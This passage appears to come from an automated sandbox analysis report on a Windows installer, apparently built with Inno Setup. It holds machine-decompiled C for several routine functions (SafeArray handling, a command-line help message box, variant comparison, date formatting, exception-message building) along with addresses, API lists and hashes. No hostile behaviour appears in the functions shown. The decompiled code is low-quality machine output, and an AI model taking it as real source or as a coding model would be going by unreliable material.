							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                    0x0042931c
                                                                    0x00429328
                                                                    0x0042932e
                                                                    0x00429334
                                                                    0x00429344
                                                                    0x0042934b
                                                                    0x0042934b
                                                                    0x00429356
                                                                    0x00429364
                                                                    0x004294ef
                                                                    0x004294f6
                                                                    0x004294f7
                                                                    0x00000000
                                                                    0x0042936a
                                                                    0x0042936d
                                                                    0x0042938b
                                                                    0x0042936f
                                                                    0x0042937a
                                                                    0x0042937a
                                                                    0x0042939a
                                                                    0x004293a6
                                                                    0x004293a9
                                                                    0x00429416
                                                                    0x0042941c
                                                                    0x0042941d
                                                                    0x00429423
                                                                    0x00429424
                                                                    0x00429426
                                                                    0x0042942b
                                                                    0x0042942f
                                                                    0x00429431
                                                                    0x00429431
                                                                    0x0042943c
                                                                    0x00429447
                                                                    0x00429452
                                                                    0x0042945b
                                                                    0x0042945e
                                                                    0x0042947a
                                                                    0x00429481
                                                                    0x0042948c
                                                                    0x004294a3
                                                                    0x004294a8
                                                                    0x004294bc
                                                                    0x004294c1
                                                                    0x004294d4
                                                                    0x004294d4
                                                                    0x004294dd
                                                                    0x00429460
                                                                    0x00429460
                                                                    0x00429461
                                                                    0x00429467
                                                                    0x0042946d
                                                                    0x0042946f
                                                                    0x00429471
                                                                    0x00429474
                                                                    0x00429477
                                                                    0x00429477
                                                                    0x0042947a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042947a
                                                                    0x004293ab
                                                                    0x004293ab
                                                                    0x004293ac
                                                                    0x004293ae
                                                                    0x004293b4
                                                                    0x004293b6
                                                                    0x004293c5
                                                                    0x004293c6
                                                                    0x004293d0
                                                                    0x004293d1
                                                                    0x004293d6
                                                                    0x004293e1
                                                                    0x004293e2
                                                                    0x004293ec
                                                                    0x004293ed
                                                                    0x004293f2
                                                                    0x0042940d
                                                                    0x0042940f
                                                                    0x00429410
                                                                    0x00429413
                                                                    0x00429413
                                                                    0x00000000
                                                                    0x004293b4
                                                                    0x004293a9

                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                    • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                    • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                    • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 34%
                                                                    			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                                    0x004afa44
                                                                    0x004afa44
                                                                    0x004afa47
                                                                    0x004afa49
                                                                    0x004afa4c
                                                                    0x004afa50
                                                                    0x004afa51
                                                                    0x004afa56
                                                                    0x004afa59
                                                                    0x004afa63
                                                                    0x004afa77
                                                                    0x004afa65
                                                                    0x004afa6d
                                                                    0x004afa6d
                                                                    0x004afa7c
                                                                    0x004afa81
                                                                    0x004afa84
                                                                    0x004afa85
                                                                    0x004afa8a
                                                                    0x004afa97
                                                                    0x004afaae
                                                                    0x004afab5
                                                                    0x004afab8
                                                                    0x004afabb
                                                                    0x004afacd

                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                    Strings
                                                                    • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                    • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                    • Setup, xrefs: 004AFA9E
                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                    • API String ID: 2030045667-3391638011
                                                                    • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                    • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                    • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                    • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                    0x0042f9b8
                                                                    0x0042f9b8
                                                                    0x0042f9b9
                                                                    0x0042f9bb
                                                                    0x0042f9bf
                                                                    0x0042f9c2
                                                                    0x0042f9c5
                                                                    0x0042f9c8
                                                                    0x0042f9cf
                                                                    0x0042f9dc
                                                                    0x0042fb6d
                                                                    0x0042fb73
                                                                    0x0042fb8a
                                                                    0x0042fbac
                                                                    0x0042fbbb
                                                                    0x0042fbc7
                                                                    0x0042fbce
                                                                    0x0042fc88
                                                                    0x0042fc95
                                                                    0x0042fd0a
                                                                    0x0042fd19
                                                                    0x0042fd25
                                                                    0x0042fd2c
                                                                    0x0042fde0
                                                                    0x00000000
                                                                    0x0042fd32
                                                                    0x0042fd3c
                                                                    0x0042fdd6
                                                                    0x0042fddb
                                                                    0x00000000
                                                                    0x0042fd3e
                                                                    0x0042fd41
                                                                    0x0042fd42
                                                                    0x0042fd49
                                                                    0x0042fd4a
                                                                    0x0042fd4f
                                                                    0x0042fd52
                                                                    0x0042fd55
                                                                    0x0042fd5f
                                                                    0x0042fd6c
                                                                    0x0042fd6e
                                                                    0x0042fd6e
                                                                    0x0042fd92
                                                                    0x0042fd97
                                                                    0x0042fd9c
                                                                    0x0042fd9f
                                                                    0x0042fda2
                                                                    0x0042fdaf
                                                                    0x0042fdaf
                                                                    0x0042fd3c
                                                                    0x0042fd0c
                                                                    0x0042fd0c
                                                                    0x00000000
                                                                    0x0042fd0c
                                                                    0x0042fc97
                                                                    0x0042fc9a
                                                                    0x0042fc9b
                                                                    0x0042fca2
                                                                    0x0042fca3
                                                                    0x0042fca8
                                                                    0x0042fcab
                                                                    0x0042fcb1
                                                                    0x0042fcba
                                                                    0x0042fcc9
                                                                    0x0042fccb
                                                                    0x0042fccb
                                                                    0x0042fcde
                                                                    0x0042fce3
                                                                    0x0042fce6
                                                                    0x0042fce9
                                                                    0x0042fcf6
                                                                    0x0042fcf6
                                                                    0x0042fbd4
                                                                    0x0042fbde
                                                                    0x0042fc78
                                                                    0x0042fc7d
                                                                    0x00000000
                                                                    0x0042fbe0
                                                                    0x0042fbe3
                                                                    0x0042fbe4
                                                                    0x0042fbeb
                                                                    0x0042fbec
                                                                    0x0042fbf1
                                                                    0x0042fbf4
                                                                    0x0042fbf7
                                                                    0x0042fc01
                                                                    0x0042fc0e
                                                                    0x0042fc10
                                                                    0x0042fc10
                                                                    0x0042fc34
                                                                    0x0042fc39
                                                                    0x0042fc3e
                                                                    0x0042fc41
                                                                    0x0042fc44
                                                                    0x0042fc51
                                                                    0x0042fc51
                                                                    0x0042fbde
                                                                    0x0042fbae
                                                                    0x0042fbae
                                                                    0x00000000
                                                                    0x0042fbae
                                                                    0x0042fb8c
                                                                    0x0042fb98
                                                                    0x00000000
                                                                    0x0042fb98
                                                                    0x0042fb75
                                                                    0x0042fb7e
                                                                    0x00000000
                                                                    0x0042fb7e
                                                                    0x0042f9e2
                                                                    0x0042f9e5
                                                                    0x0042f9fc
                                                                    0x0042fa22
                                                                    0x0042fa31
                                                                    0x0042fa3d
                                                                    0x0042fa44
                                                                    0x0042fb02
                                                                    0x0042fb03
                                                                    0x0042fb0a
                                                                    0x0042fb0b
                                                                    0x0042fb10
                                                                    0x0042fb13
                                                                    0x0042fb19
                                                                    0x0042fb22
                                                                    0x0042fb35
                                                                    0x0042fb37
                                                                    0x0042fb37
                                                                    0x0042fb4a
                                                                    0x0042fb4f
                                                                    0x0042fb52
                                                                    0x0042fb55
                                                                    0x0042fb62
                                                                    0x0042fa4a
                                                                    0x0042fa54
                                                                    0x0042faf2
                                                                    0x0042faf7
                                                                    0x00000000
                                                                    0x0042fa56
                                                                    0x0042fa59
                                                                    0x0042fa5a
                                                                    0x0042fa61
                                                                    0x0042fa62
                                                                    0x0042fa67
                                                                    0x0042fa6a
                                                                    0x0042fa6d
                                                                    0x0042fa77
                                                                    0x0042fa88
                                                                    0x0042fa8a
                                                                    0x0042fa8a
                                                                    0x0042faae
                                                                    0x0042fab3
                                                                    0x0042fab8
                                                                    0x0042fabb
                                                                    0x0042fabe
                                                                    0x0042facb
                                                                    0x0042facb
                                                                    0x0042fa54
                                                                    0x0042fa24
                                                                    0x0042fa24
                                                                    0x00000000
                                                                    0x0042fa24
                                                                    0x0042f9fe
                                                                    0x0042fa0a
                                                                    0x00000000
                                                                    0x0042fa0a
                                                                    0x0042f9e7
                                                                    0x0042f9f0
                                                                    0x0042fde5
                                                                    0x0042fded
                                                                    0x0042fded
                                                                    0x0042f9e5

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                    • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                    • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                    • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                                    0x0041c79d
                                                                    0x0041c7a0
                                                                    0x0041c7a2
                                                                    0x0041c7a6
                                                                    0x0041c7a7
                                                                    0x0041c7ac
                                                                    0x0041c7af
                                                                    0x0041c7b4
                                                                    0x0041c7c0
                                                                    0x0041c7cb
                                                                    0x0041c7d6
                                                                    0x0041c7dd
                                                                    0x0041c7f6
                                                                    0x0041c7df
                                                                    0x0041c7e7
                                                                    0x0041c7e7
                                                                    0x0041c80a
                                                                    0x0041c823
                                                                    0x0041c832
                                                                    0x0041c838
                                                                    0x0041c842
                                                                    0x0041c846
                                                                    0x0041c84b
                                                                    0x0041c84b
                                                                    0x0041c858
                                                                    0x0041c858
                                                                    0x0041c838
                                                                    0x0041c85f
                                                                    0x0041c862
                                                                    0x0041c865
                                                                    0x0041c872

                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DateFormatLocaleThread
                                                                    • String ID: $yyyy
                                                                    • API String ID: 3303714858-404527807
                                                                    • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                    • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                    • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                    • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                                    0x0041ef0a
                                                                    0x0041ef10
                                                                    0x0041ef13
                                                                    0x0041ef15
                                                                    0x0041ef19
                                                                    0x0041ef1a
                                                                    0x0041ef1f
                                                                    0x0041ef22
                                                                    0x0041ef2f
                                                                    0x0041ef3e
                                                                    0x0041ef6e
                                                                    0x0041ef7a
                                                                    0x0041ef7f
                                                                    0x0041ef85
                                                                    0x0041ef85
                                                                    0x0041efa7
                                                                    0x0041efac
                                                                    0x0041efb1
                                                                    0x0041efb8
                                                                    0x0041efc5
                                                                    0x0041efcf
                                                                    0x0041efd3
                                                                    0x0041efda
                                                                    0x0041efe4
                                                                    0x0041efe4
                                                                    0x0041efda
                                                                    0x0041eff5
                                                                    0x0041effa
                                                                    0x0041f009
                                                                    0x0041f016
                                                                    0x0041f021
                                                                    0x0041f027
                                                                    0x0041f034
                                                                    0x0041f03a
                                                                    0x0041f044
                                                                    0x0041f04a
                                                                    0x0041f051
                                                                    0x0041f057
                                                                    0x0041f05e
                                                                    0x0041f064
                                                                    0x0041f080
                                                                    0x0041f088
                                                                    0x0041f091
                                                                    0x0041f094
                                                                    0x0041f097
                                                                    0x0041f0a7

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
